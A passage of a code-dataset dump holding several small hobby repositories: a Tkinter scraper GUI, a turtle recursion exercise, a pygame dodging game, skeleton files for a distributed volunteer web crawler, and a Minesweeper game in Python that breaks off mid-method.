padx=25)\n\n for jj, ser in enumerate(stockPf):\n Message(top2, text=ser, font=dFont).grid(row=1, column=jj, padx=25)\n\n top2.focus_force()\n top2.mainloop()\n return top2\n\n\nroot = Tk() # Makes the basic window\nroot.title('GUI 4 Scrapes!')\n\nredditFrame = Frame(root).grid(row=0, column=0, sticky=W, padx=100)\nstockFrame = Frame(root).grid(row=0, column=1, sticky=E, padx=100)\n\nredText = StringVar()\nstockText = StringVar()\n\n# Create the reddit label and button\nredditLabel = Label(redditFrame, textvariable=redText).grid(row=1, column=0, sticky=W)\nredditEntry = Entry(redditFrame)\nredditEntry.grid(row=2, column=0, sticky=W)\nredditButton = Button(redditFrame, text='Scrape Reddit', command=scrapereddit)\nredditButton.grid(row=3, column=0, sticky=W)\n\n# Create the stock label and button\nstockLabel = Label(stockFrame, textvariable=stockText).grid(row=1, column=1, sticky=E)\nstockEntry = Entry(stockFrame, width=30)\nstockEntry.grid(row=2, column=1, sticky=E)\nstockButton = Button(stockFrame, text='Scrape Stocks', command=scrapestocks)\nstockButton.grid(row=3, column=1, sticky=E)\n# Setting the text for the labels(Could also do it when creating label)\nredText.set('Scrape a subreddit\\'s headlines.\\nEnter subreddit name exactly.')\nstockText.set('Get the stock market data for companies.\\nEnter abbreviations separated by a space.')\n\nroot.mainloop() # Keeps the window open until it is closed.\n"
},
{
"alpha_fraction": 0.4294871687889099,
"alphanum_fraction": 0.6858974099159241,
"avg_line_length": 14.600000381469727,
"blob_id": "bd6785bbc2686533950541521612f480273c8d95",
"content_id": "fa94f3d1a3b3e838ae196ebc73f100173de68096",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 10,
"path": "/Projects/Gui4Scrapes/requirements.txt",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "beautifulsoup4==4.5.3\nbs4==0.0.1\nnumpy==1.11.3\npandas==0.19.2\npython-dateutil==2.6.0\npytz==2016.10\nrequests==2.12.4\nsip==4.19\nsix==1.10.0\nUnidecode==0.4.19\n"
}
] | 8 |
notjohnnymalone/CC1-S01
|
https://github.com/notjohnnymalone/CC1-S01
|
ab439cc727d2c5125c0f0f8d108773a719d84929
|
498ee2a4578ab199673a1b4ec1df5b31b00bac8e
|
a0a1b91867e7bdddf9b8c68f150455ab7c908a1e
|
refs/heads/main
| 2023-08-26T02:23:13.481859 | 2021-11-02T05:02:34 | 2021-11-02T05:02:34 | 423,712,147 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7371794581413269,
"alphanum_fraction": 0.7756410241127014,
"avg_line_length": 38,
"blob_id": "6e6ac8d07a6790648e1a18abc4d2d8cf010b7516",
"content_id": "2844d3ce057c63cca7463e66dbbd7bfe3939a259",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 4,
"path": "/README.md",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "# CC1-S01\nThe First part is is the plain CC1-S01 file\nThat explanation and part two is in the txt answers file\npart three is in the file marked part three\n"
},
{
"alpha_fraction": 0.4176570475101471,
"alphanum_fraction": 0.4594227373600006,
"avg_line_length": 27.469999313354492,
"blob_id": "339e3a03499b1c53104de3100fab2df6a9124bb3",
"content_id": "b1ad266fb895f26392c6b31589e16a96afc92194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2945,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 100,
"path": "/cc1-s01_ReidAMartin_.py",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "######################################\r\n###- CC1-S01 Recursion\r\n###- Reid A. Martin\r\n###- October 29, 2021\r\n######################################\r\n#note: programmed with hatred and a cat licking my elbow\r\n#note 2: yes i know this is being drawn backwards... but this is honestly the only way i could get it to work\r\n#AND YOU SAID IT HAD TO PRODUCE SOMETHING SIMILAR NOT EXACT... and no i dont know how i did it...\r\n\r\n#################\r\n\r\nimport turtle #imports turtle module\r\n\r\n##############\r\n\r\ngo = True #sets while variable\r\n\r\nrun = 3 #number of runs variable set\r\nsize = 2 #size? variable set... I used to know what it did\r\n\r\nbranchLen = 40 #sets branch length\r\n\r\n####################\r\n\r\nt = turtle.Turtle() #sets turtle variable\r\nmyWin = turtle.Screen() #sets up screen\r\n\r\nt.left(90) #puts turtle in position and sets his colour\r\nt.color(\"green\")\r\n\r\nwhile go == True: #while loop\r\n\r\n if run == 3:\r\n if size == 2: #draws first branch\r\n t.right(60)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n size = size - 1\r\n elif size == 1: #draws second end branch with mid branch\r\n t.left(40)\r\n t.forward(20)\r\n t.right(20)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n t.right(20)\r\n t.backward(30)\r\n t.left(40)\r\n size = size + 1\r\n run = run - 1\r\n \r\n elif run == 2:\r\n if branchLen >= 10: #draws path of branches on other side\r\n t.forward(branchLen - 10)\r\n branchLen = branchLen - 10\r\n t.left(20) \r\n elif branchLen == 0: #sends turtle back up to finish the branch\r\n branchLen = branchLen + 5\r\n t.right(40)\r\n branchLen = 40\r\n run = run - 1\r\n \r\n elif run == 1:\r\n if size == 2: #takes back to second level of branch to draw one part\r\n t.backward(10)\r\n t.right(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(20)\r\n t.backward(20)\r\n t.right(40)\r\n size = size - 1 \r\n elif size == 1: #draws remaining branch\r\n t.forward(20)\r\n t.right(20)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n size = size - 1 \r\n else: #takes turtle back home to the bottom\r\n t.left(20)\r\n t.backward(30)\r\n run = run + 10\r\n t.right(20)\r\n t.backward(branchLen)\r\n \r\n else:#ends the while loop\r\n go = False"
},
{
"alpha_fraction": 0.5690072774887085,
"alphanum_fraction": 0.6004842519760132,
"avg_line_length": 25.600000381469727,
"blob_id": "d31b1a8c2ca1529fb5143531f00c415b63696374",
"content_id": "478d9125ad181814fb89eba659e7163179145e7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 30,
"path": "/cc1-s01_Part3_ReidAMartin_.py",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "###########################\r\n#- CC1-S01 Part Three\r\n#- Reid A. Martin\r\n###########################\r\n\r\n#This program draws what appears to be the first person perspective of looking down a really long tunnel\r\n\r\n\r\nimport turtle\r\nt = turtle.Turtle() \r\nmyWin = turtle.Screen()\r\n\r\n#radius = 100\r\nt.speed(100) #cranks the turtles speed up bc he is just too slow\r\n\r\ndef tunnel(radius): \r\n if radius >= 5: #runs when the radius is greater than or equal to 10\r\n t.circle(radius) # draws a circle\r\n tunnel(radius - 2.5) #runs with the radius being 2.5 units smaller than the last time\r\n \r\ndef main(): #puts the turtle in position (at the bottom of the screen)\r\n t.up()\r\n t.right(90)\r\n t.forward(400)\r\n t.left(90)\r\n t.down()\r\n tunnel(700) #runs the tunnel function\r\n myWin.exitonclick()\r\n \r\nmain()"
}
] | 3 |
betzevim/Game
|
https://github.com/betzevim/Game
|
87c94c8df5cf749432bb356146adfb8aed85a163
|
6529439f7a4f65cf647fe1e9a830fed2d4c55dc3
|
85315ac09b074e78925c72f9cf84df9a59a11ae3
|
refs/heads/master
| 2021-01-21T05:15:14.745364 | 2017-02-26T21:55:06 | 2017-02-26T21:55:06 | 83,160,919 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5520405769348145,
"alphanum_fraction": 0.5897126197814941,
"avg_line_length": 22.40113067626953,
"blob_id": "367c80ea064cf3e4b4a85b45d13c41046f6b4c43",
"content_id": "ed9e431d1b6f58c4eb3b3eda2d2d6def73c66ba1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4141,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 177,
"path": "/gameproto.py",
"repo_name": "betzevim/Game",
"src_encoding": "UTF-8",
"text": "import pygame, math, sys, random\n\nfrom pygame.locals import *\nscreen = pygame.display.set_mode((1280, 748))\n\npygame.init()\n\nclock = pygame.time.Clock()\nFRAMES_PER_SECOND = 30\n\nx = 0\ny = 0\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nfont = pygame.font.SysFont('arial', 18)\n\n\nballs = []\n\nball_rad = 20\n\nx_speed = 0\ny_speed = 0\nx_accel = 0\ny_accel = 0\nfriction = 0.88\n\nlev = 0\n\nlives = 1 # increase this to make the game easier\n\ndef constrain(val, minny, maxxy):\n\tif minny > val: return minny\n\tif maxxy < val: return maxxy\n\treturn val\n\ndef addball(Type):\n\tx = random.randrange(300, screen.get_width() - ball_rad)\n\ty = random.randrange(300, screen.get_height() - ball_rad)\n\tif Type == 1:\n\t\tx = screen.get_width() - 100\n\t\ty = screen.get_height() - 100\n\t\tcolor = (0, 0, 0)\n\tif Type == 2:\n\t\tcolor = (255, 0, 0)\n\tif Type == 3:\n\t\tcolor = (255, 255, 0)\n\tif Type == 4:\n\t\tcolor = (245, 245, 245)\n\tball = {\n\t\t'Type':Type,\n\t\t'color':color,\n\t\t'xsp':5,\n\t\t'ysp':5,\n\t\t'x':x,\n\t\t'y':y\n\t}\n\tballs.append(ball)\n\n\n\nsld = 0\npaused = False\n\ndef reset_balls(lev_up):\n\tdel balls[:]\n\tglobal lev, x, y, font, B_slow, B_live, sld, dmgB\n\tscreen.fill((BLACK))\n\tsld = 1\n\tpygame.display.flip()\n\tclock.tick(FRAMES_PER_SECOND)\n\tscreen.fill(WHITE)\n\tpygame.display.flip()\n\tclock.tick(FRAMES_PER_SECOND)\n\tx_speed = 0\n\ty_speed = 0\n\tif lev_up:\n\t\tlev += 1\n\t\tdmgB = lev\n\t\tB_slow = int(lev / 2) + 1\n\t\tB_live = int(lev / 4) + 1\n\tfor i in range(B_slow):\n\t\taddball(3)\n\tfor i in range(B_live):\n\t\taddball(4)\n\taddball(1)\n\tx = 0\n\ty = 0\n\tfor i in range(dmgB):\n\t\taddball(2)\n\n\ndef change_sp(num):\n\tfor ball in balls:\n\t\tball['xsp'] = num\n\t\tball['ysp'] = num\n\n\nreset_balls(True)\n\nwhile 1:\n\tdeltat = clock.tick(FRAMES_PER_SECOND)\n\tpygame.event.pump()\n\tXkeys = pygame.key.get_pressed()\n\tfor event in pygame.event.get():\n\t\tif event.type == KEYUP:\n\t\t\tif (event.key == K_p or event.key == K_SPACE or event.key == K_LSHIFT):\n\t\t\t\tpaused = not paused\n\tif not paused:\n\t\tx_accel = x_speed * 0.1\n\t\ty_accel = y_speed * 0.1\n\t\tx_accel = abs(x_accel)\n\t\ty_accel = abs(y_accel)\n\t\tx_accel = constrain(x_accel, 3, 5)\n\t\ty_accel = constrain(y_accel, 3, 5)\n\t\tif Xkeys[K_RIGHT]: x_speed += x_accel\n\t\tif Xkeys[K_LEFT]: x_speed -= x_accel\n\t\tif Xkeys[K_UP]: y_speed -= y_accel\n\t\tif Xkeys[K_DOWN]: y_speed += y_accel\n\t\tif Xkeys[K_ESCAPE]: sys.exit(0)\n\t\tx_speed *= friction\n\t\ty_speed *= friction\n\t\tx += x_speed\n\t\ty += y_speed\n\t\tx_speed = constrain(x_speed, -20, 20)\n\t\ty_speed = constrain(y_speed, -20, 20)\n\t\tscreen.fill(WHITE)\n\t\tdelete = 0\n\t\tcntdwn = ''\n\t\tif sld > 0:\n\t\t\tsld -= 1\n\t\t\tif sld == 0:\n\t\t\t\tchange_sp(10) \n\t\tdel_slow = False\n\t\tfor ball in balls:\n\t\t\tball['x'] += ball['xsp']\n\t\t\tball['y'] += ball['ysp']\n\t\t\tif ball['x'] < ball_rad or ball['x'] >= (screen.get_width() - ball_rad) or random.uniform(1, 50) < 1.5:\n\t\t\t\tball['xsp'] *= -1\n\t\t\tif ball['y'] < ball_rad or ball['y'] >= (screen.get_height() - ball_rad) or random.uniform(1, 50) < 1.5:\n\t\t\t\tball['ysp'] *= -1\n\t\t\tball['x'] = constrain(ball['x'], ball_rad, screen.get_width() - ball_rad)\n\t\t\tball['y'] = constrain(ball['y'], ball_rad, screen.get_height() - ball_rad)\n\t\t\tpygame.draw.circle(screen, ball['color'], (int(ball['x']),int(ball['y'])), ball_rad)\n\t\t\txdis = x - ball['x']\n\t\t\tydis = y - ball['y']\n\t\t\tif ydis * ydis + xdis * xdis < ball_rad * 4 * ball_rad:\n\t\t\t\tif ball['Type'] == 1:\n\t\t\t\t\treset_balls(True)\n\t\t\t\telif ball ['Type'] == 3:\n\t\t\t\t\tsld += 400\n\t\t\t\t\tchange_sp(5)\n\t\t\t\t\tdel_slow = True\n\t\t\t\telif ball['Type'] == 4:\n\t\t\t\t\tB_live -= 1\n\t\t\t\t\tif lives < 10:\n\t\t\t\t\t\tlives += 1\n\t\t\t\t\tdelete = ball\n\t\t\t\telse:\n\t\t\t\t\tlives -= 1\n\t\t\t\t\tdmgB -= 1\n\t\t\t\t\treset_balls(False)\n\t\t\t\t\tif lives < 1:\n\t\t\t\t\t\tsys.exit(0)\n\t\tif delete != 0: balls.remove(delete)\n\t\tif del_slow:\n\t\t\tfor i in reversed(range(len(balls))):\n\t\t\t\tif balls[i]['Type'] == 3:\n\t\t\t\t\tballs.remove(balls[i])\n\t\tif sld > 0:\n\t\t\tcntdwn = ' DECREASED SPEED FOR ' + str(sld / FRAMES_PER_SECOND)\n\t\ttext = font.render('LEVEL: ' + str(lev) + ' LIVES: ' + str(lives) + cntdwn, False, (0, 0, 0))\n\t\tscreen.blit(text, (0, 0))\n\t\tx = constrain(x, ball_rad, screen.get_width() - ball_rad)\n\t\ty = constrain(y, ball_rad, screen.get_height() - ball_rad)\n\t\tpygame.draw.circle(screen, (0, 0, 0), (int(x), int(y)), ball_rad)\n\t\tpygame.display.flip()"
}
] | 1 |
JaydenOwenoble/9shu
|
https://github.com/JaydenOwenoble/9shu
|
be9b54a4602f7c2c8fd0dc7d8083ba54fdd032d2
|
904dc876b6dbb357de8c8e779aa77ef196c711db
|
37879bb06bac3d0799cf6cc786bda2b2a5bd0a75
|
refs/heads/master
| 2023-04-22T06:44:28.624663 | 2018-06-27T00:57:24 | 2018-06-27T00:57:24 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48336413502693176,
"alphanum_fraction": 0.48983365297317505,
"avg_line_length": 22.044445037841797,
"blob_id": "0e8402d51d811d8a9fe1d6fcce3ee487aba6e403",
"content_id": "3b4e6413d9745e1d01646e5aee6b49fa7ecf11cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 45,
"path": "/src/volunteer/net_opt.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\nimport conf\r\nimport json\r\nimport logging\r\nimport socket\r\nfrom task_interact import glb_task_interact\r\n\r\n\r\nclass NetOpt(object):\r\n def __init__(self):\r\n pass\r\n\r\n def listen_tasks(self):\r\n skt = socket.socket()\r\n skt.bind((\"\", conf.listen_task_port))\r\n skt.listen(1)\r\n\r\n while 1:\r\n cli, addr = skt.accept()\r\n req_data = \"\"\r\n while True:\r\n data = cli.recv(1024)\r\n if not data:\r\n break\r\n req_data += data\r\n cli.close()\r\n reqs_dict = self.__structuring_reqs(req_data)\r\n task_rst = glb_task_interact.exeTask(reqs_dict)\r\n print task_rst\r\n\r\n # 请求结构化\r\n # {id: (req_mod, url, header, post_data)}\r\n # header: {key: val}\r\n # post_data: {key: val}\r\n def __structuring_reqs(self, reqs_str):\r\n json_struct = None\r\n try:\r\n json_struct = json.loads(reqs_str)\r\n except:\r\n pass\r\n return json_struct\r\n\r\n\r\nglb_net_opt = NetOpt()\r\n"
},
{
"alpha_fraction": 0.6541095972061157,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 16.375,
"blob_id": "d7f423fdd750b9b9dbe2d5b18da1ed96af381d94",
"content_id": "17616436a2ffebe897f8d0f5dff44948c10508f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 16,
"path": "/src/task_manager/shu9_scrape_agent.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __SHU9_SCRAPE_AGENT_H__\r\n#define __SHU9_SCRAPE_AGENT_H__\r\n\r\n#include \"interfaces/scrape_agent.h\"\r\n\r\n\r\nclass Shu9ScrapeAgent : public IScrapeAgent\r\n{\r\n public:\r\n // Implement IScrapeAgent\r\n const char* scrapeHtmls(const char* req);\r\n const char* getQuality();\r\n};\r\n\r\n\r\n#endif"
},
{
"alpha_fraction": 0.6414141654968262,
"alphanum_fraction": 0.6565656661987305,
"avg_line_length": 11.199999809265137,
"blob_id": "c67c65f2d6f8f6ca62441a191fe04ebb3f908f6b",
"content_id": "bb29a6dbb3609735d81a44c90505010807f06105",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/src/task_manager/shu9_scrape_agent.cpp",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#include \"shu9_scrape_agent.h\"\r\n\r\n\r\nconst char*\r\nShu9ScrapeAgent::scrapeHtmls(const char* req)\r\n{\r\n return nullptr;\r\n}\r\n\r\n\r\nconst char*\r\nShu9ScrapeAgent::getQuality()\r\n{\r\n return nullptr;\r\n}\r\n"
},
{
"alpha_fraction": 0.5162790417671204,
"alphanum_fraction": 0.5209302306175232,
"avg_line_length": 14.538461685180664,
"blob_id": "3a931c49051e8a3bc75b4d59075f5521be245908",
"content_id": "8022843f617de9aaa3321e689b89ebac0dce940c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 13,
"path": "/src/volunteer/task_interact.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\n\r\nclass TaskInteract(object):\r\n def __init__(self):\r\n pass\r\n\r\n def exeTask(self, req_dict):\r\n rst = \"\"\r\n return req_dict\r\n\r\n\r\nglb_task_interact = TaskInteract()\r\n"
},
{
"alpha_fraction": 0.5337423086166382,
"alphanum_fraction": 0.546012282371521,
"avg_line_length": 10.538461685180664,
"blob_id": "02af514fc7e523b3ed57ef865d6861381ad0b19f",
"content_id": "d6affa0d828a0bb4ed70d0299c3e128d617372e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 13,
"path": "/src/task_manager/store.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_STORE_H__\r\n#define __IF_STORE_H__\r\n\r\n\r\nclass IStore\r\n{\r\n public:\r\n virtual bool saveRsps() = 0;\r\n virtual bool getReqs() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.5449735522270203,
"alphanum_fraction": 0.5476190447807312,
"avg_line_length": 19,
"blob_id": "84e69454929e13e3cd9a01dde6e7dae6869edc7a",
"content_id": "60e71017dd5699933e4607fd26e058db45082364",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 18,
"path": "/src/volunteer/main.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\nimport logging\r\nlogging.basicConfig(\r\n level = logging.DEBUG,\r\n format = '%(asctime)s|%(levelname)s|%(filename)s:%(lineno)d|%(message)s',\r\n datefmt = '%Y%m%d_%H%M%S',\r\n filename = './ou.log',\r\n filemode = 'w'\r\n)\r\nfrom net_opt import glb_net_opt\r\n\r\ndef main():\r\n glb_net_opt.listen_tasks()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
},
{
"alpha_fraction": 0.5933333039283752,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 10.5,
"blob_id": "4459f7bc38c1ac8604547032104659460f73fb19",
"content_id": "16096f7afebeba47c1056a937d1d0aedb44ede5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 12,
"path": "/src/task_manager/companions.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_COMPANIONS_H__\r\n#define __IF_COMPANIONS_H__\r\n\r\n\r\nclass ICompanions\r\n{\r\n public:\r\n virtual bool sendHeartBeat() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.6128440499305725,
"alphanum_fraction": 0.6165137887001038,
"avg_line_length": 17.464284896850586,
"blob_id": "6ed40d00087b67ddfbb3fc032bd73295e7b8e746",
"content_id": "41ef68a4f4ccc31d67203fce0b242ab53a292455",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 28,
"path": "/src/task_manager/scrape_agent.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_SCRAPE_AGENT_H__\r\n#define __IF_SCRAPE_AGENT_H__\r\n\r\n\r\nenum ScrapeStatus\r\n{\r\n SCRAPE_OK,\r\n SCRAPE_FAIL\r\n};\r\n\r\n\r\n/** Scrape agent interface\r\n * function: By this interface you can control one scrape.\r\n */\r\nclass IScrapeAgent\r\n{\r\n public:\r\n /** Scrape htmls\r\n * function: Get a batch of htmls by a batch of requests.\r\n * desc: This is a block function. */\r\n virtual ScrapeStatus scrapeHtmls(const char* req) = 0;\r\n\r\n /** Get the capacity of scrape. */\r\n virtual const char* getQuality() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.4441087543964386,
"alphanum_fraction": 0.4501510560512543,
"avg_line_length": 18.47058868408203,
"blob_id": "3cf5a1db1ea74ca6c248f66b641d0dd7f75f6f59",
"content_id": "f15f281b0fd07091b6b4b104307ac87c58c855b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 479,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/README.md",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# 9shu\n- 分布式志愿者爬虫系统\n\n# 目录结构\n```\n├── build.sh # 编译程序\n├── README.md\n└── src/ # 存放源码\n ├── common/ # 通用部分\n ├── spider_svc/ # 爬虫业务模块\n ├── storekeeper/ # 存储模块\n ├── task_manager/ # 任务管理模块\n └── volunteer/ # 志愿者模块\n```\n\n# 文档\n- 见[wiki](https://github.com/bcyxy/9shu/wiki)\n"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 13,
"blob_id": "d4fb6b63bc08e7d72e86cdb7b452b96b0ae3db41",
"content_id": "cb4277a926447df1e7f2099be5be15f95ea07f5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 60,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 4,
"path": "/src/volunteer/conf.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\n# task\r\nlisten_task_port = 20186\r\n"
}
] | 10 |
pgugninskiy/B5.9.1gugp
|
https://github.com/pgugninskiy/B5.9.1gugp
|
5dc81300b04923410c6dcd21ad2d14fee4996321
|
ce8ad6492f2f16fcb0451a99588d38e9d937d4e1
|
62be4c125f756476c24c416a8cc27db2e0dc4dd6
|
refs/heads/master
| 2022-11-16T21:07:01.974220 | 2020-07-12T17:59:04 | 2020-07-12T17:59:04 | 279,119,158 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4848144054412842,
"alphanum_fraction": 0.5039370059967041,
"avg_line_length": 25.65625,
"blob_id": "7bf430029be8c121cf2ec484de5ff6fdb975cd06",
"content_id": "4d55c81e76399f56d39345c623e457445dc7c4cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 962,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 32,
"path": "/decorate.py",
"repo_name": "pgugninskiy/B5.9.1gugp",
"src_encoding": "UTF-8",
"text": "import time\r\nclass Secundomer:\r\n def __init__(self,iters):\r\n self.iters = iters\r\n\r\n def __call__(self,f):\r\n def wrapper(*args, **kwargs):\r\n avg_time = 0\r\n for i in range(self.iters) :\r\n t0 = time.time()\r\n return_value = f(*args, **kwargs)\r\n t1 = time.time()\r\n avg_time += (t1 - t0)\r\n avg_time /= self.iters\r\n print(\"Выполнение заняло %.5f секунд\" % avg_time)\r\n return return_value\r\n return wrapper\r\n\r\n def __enter__(self):\r\n self.t0 = time.time\r\n return self.t0\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.t1 = time.time\r\n\r\nprint(\"Пожалуиста, введите количество циклов для расчета скорости\")\r\na=int(input())\r\n@Secundomer(iters=a)\r\ndef Hrono():\r\n for i in range(1,1000000):\r\n pass\r\nHrono()\r\n\r\n\r\n"
}
] | 1 |
haotiaz/Minesweeper
|
https://github.com/haotiaz/Minesweeper
|
fc1f47b8adedb62149da170348a2c5d65f4f86b3
|
fc51c3fd8e8cd1aaaee05cc958a439b0191cee21
|
da6ce15a1d4c1069dcffe0284d1ef49fd95243ff
|
refs/heads/master
| 2020-04-05T03:06:42.212267 | 2018-11-07T06:40:14 | 2018-11-07T06:40:14 | 156,501,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4417688846588135,
"alphanum_fraction": 0.46085113286972046,
"avg_line_length": 29.566667556762695,
"blob_id": "8add2638874d65de8ac007f18b2e9dc9fd14a74b",
"content_id": "61fc98a554be1b606e61c1a70bc9461f01970f7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6603,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 210,
"path": "/Minesweeper.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 11:42:40 2018\n\n@author: apple\n\"\"\"\n\nfrom Square import Square\nfrom random import choice\n\nclass Minesweeper():\n def __init__(self,a,b,bomb):\n self.height=a\n self.length=b\n self.board=[]\n self.bombNum=bomb\n self.status='In progress'\n for y in range(a):\n self.board.append([])\n for x in range(b):\n self.board[y].append(Square())\n #randomly assign bombs\n for n in range(bomb):\n chosenSquare=choice(choice(self.board))\n while chosenSquare.getBomb():\n chosenSquare=choice(choice(self.board))\n chosenSquare.setBomb(True)\n \n def printBoard(self):\n firstLine=' '\n for a in range(1,self.length+1):\n firstLine=firstLine+str(a)+' '\n print(firstLine[0:-1])\n lineNum=1\n for line in self.board:\n lineText=str(lineNum)+' '\n for square in line:\n lineText=lineText+square.getText()+' '\n print(lineText[0:-1])\n lineNum=lineNum+1\n \n def checkValid(self,y,x):\n if y>self.height or x>self.length or x<1 or y<1:\n return False\n if self.board[y-1][x-1].isSelected():\n return False\n return True\n \n def select(self,y,x):\n if self.checkValid(y,x) and not(self.board[y-1][x-1].isFlagged()):\n square=self.board[y-1][x-1]\n square.beSelected()\n square.changeText(self.surrounding(y-1,x-1))\n if self.surrounding(y-1,x-1)=='0':\n self.autoSelect(y,x)\n else:\n print('Invalid Input')\n \n def getStatus(self):\n return self.status\n \n def setStatus(self,status):\n self.status=status\n \n def flag(self,y,x):\n if self.checkValid(y,x):\n if not self.board[y-1][x-1].isFlagged():\n self.board[y-1][x-1].beFlagged()\n self.board[y-1][x-1].changeText('F')\n else:\n print('Invalid Input')\n else:\n print('Invalid Input')\n \n def unflag(self,y,x):\n if self.checkValid(y,x):\n if self.board[y-1][x-1].isFlagged():\n self.board[y-1][x-1].beUnflagged()\n self.board[y-1][x-1].changeText('-')\n else:\n print('Invalid Input')\n else:\n print('Invalid Input')\n \n def _getSolution(self):\n for a in range(len(self.board)):\n for b in range(len(self.board[0])):\n if self.board[a][b].getBomb():\n self.board[a][b].changeText('B')\n else:\n self.board[a][b].changeText(self.surrounding(a,b))\n \n def surrounding(self,y,x):\n '''y,x start from 0'''\n bombNum=0\n try:\n if self.board[y+1][x].getBomb():\n if y+1==len(self.board):\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y+1][x+1].getBomb():\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y+1][x-1].getBomb():\n if x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y][x+1].getBomb():\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y][x-1].getBomb():\n if x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n 